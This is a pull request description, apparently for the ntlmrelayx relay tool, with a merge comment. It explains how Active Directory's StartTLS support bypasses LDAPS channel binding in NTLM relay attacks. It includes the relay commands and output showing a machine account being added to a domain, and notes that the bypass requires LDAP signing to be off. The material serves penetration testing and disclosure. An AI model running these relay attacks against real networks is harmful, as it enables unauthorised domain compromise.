Implementing StartTLS

[ThePirateWhoSmellsOfSunflowers]

Hello all!

While doing research on LDAP client certificate authentication, I realize that the LDAP implementation of Active Directory supports the StartTLS mechanism, which has interesting implications on relay attacks.

TL;DR: Active Directory LDAP implements StartTLS and it can be used to bypass the Channel Binding requirement of LDAPS for some relay attacks such as the creation of a machine account if LDAP signing is not required by the domain controller.

More info in the accompanying blog post.

Example

Relaying to LDAPS with Channel Binding:

$ ntlmrelayx.py -t ldaps://172.20.15.209 --no-da --no-acl --no-validate-privs --add-computer 'OFFSECATTACK$' -smb2support --http-port 3128

[…]

[*] HTTPD: Received connection from 172.16.0.40, attacking target ldaps://172.20.15.209
[*] Authenticating against ldaps://172.20.15.209 as OFFSEC\LAP1337$ FAILED

With this PR, ntlmrelayx uses StartTLS and the attack works:

$ ntlmrelayx.py -t ldap://172.20.15.209 --no-da --no-acl --no-validate-privs --add-computer 'OFFSECATTACK$' -smb2support --http-port 8080

[…]

[*] HTTPD: Received connection from 172.16.0.40, attacking target ldap://172.20.15.209
[*] Authenticating against ldap://172.20.15.209 as OFFSEC\LAP1337$ SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[-] Adding a machine account to the domain requires TLS but ldap:// scheme provided. Switching target to LDAPS via StartTLS
[*] Attempting to create computer in: CN=Computers,DC=offsec,DC=local
[*] Adding new computer with username: OFFSECATTACK$ and password: +v[;6Kiid>ir)Bd result: OK

Keep in mind that this bypass only works on domain controller with LDAP signing not required.

🌻

[0xdeaddood]

Great addition, merging. Thanks @ThePirateWhoSmellsOfSunflowers!